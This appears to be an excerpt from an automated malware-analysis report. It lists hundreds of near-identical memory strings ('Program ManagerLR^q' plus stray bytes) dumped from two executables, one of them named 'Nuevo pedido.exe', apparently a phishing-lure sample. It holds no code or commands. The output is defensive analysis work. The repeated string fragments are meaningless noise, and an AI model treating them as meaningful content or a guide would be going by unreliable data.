Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXy
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLIZ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q 3/
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q${s
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8!D
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|I
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh!6
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH m
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|IL
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|).
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPRS
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHd)
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXcR
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD;<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8"M
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q TV
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh J
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8z
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT[E
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q::
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qps:
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPS?
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT[C
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\(e
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q zS
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPXA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`6Q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlO@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlq%
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD@/
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q2f
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q087
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`7=
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`y@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qF
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Y"
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPX2
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd`*
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8I6
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<PW
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlNT
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXi1
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8(,
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPXD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8HJ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDaV
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH'U
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT\
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp6f
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(k4
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxFp
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPyY
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<QC
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql0+
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<qa
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qvE
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLPl
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,t-
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|-_
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qDbB
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$C"
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhGP
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH(A
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$c@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt`?
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxhC
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q</r
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$A[
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|Ni
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q</o
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPzE
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0[%
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPV=
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(h6
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qV@
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,oW
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlL_
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q05V
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@wD
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPUQ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(gJ
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlmi
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@wA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8FU
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qL,d
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,pC
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTv
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD^X
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qh$4
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qPx"
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<ol
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt~h
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\p5
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8GA
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt>,
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,No
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhfe
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhFG
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpuq
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q07K
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH%`
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4_n
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`Uf
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`5H
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhep
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt]^
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q</0
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx%$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT=c
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD=s
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,f3
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx[>
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTtX
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q@LB
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`*L
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q n?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8~6
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtSB
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlC;
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q0+F
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd1u
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd2<
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qxZR
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4V$
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH\U
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q44?
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp(l
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt0p
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qq/
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qlBO
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|#!
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD3h
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<g#
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdtm
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<E>
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qpW
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$wG
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTSs
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|"F
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd41
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx\|e
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx<)
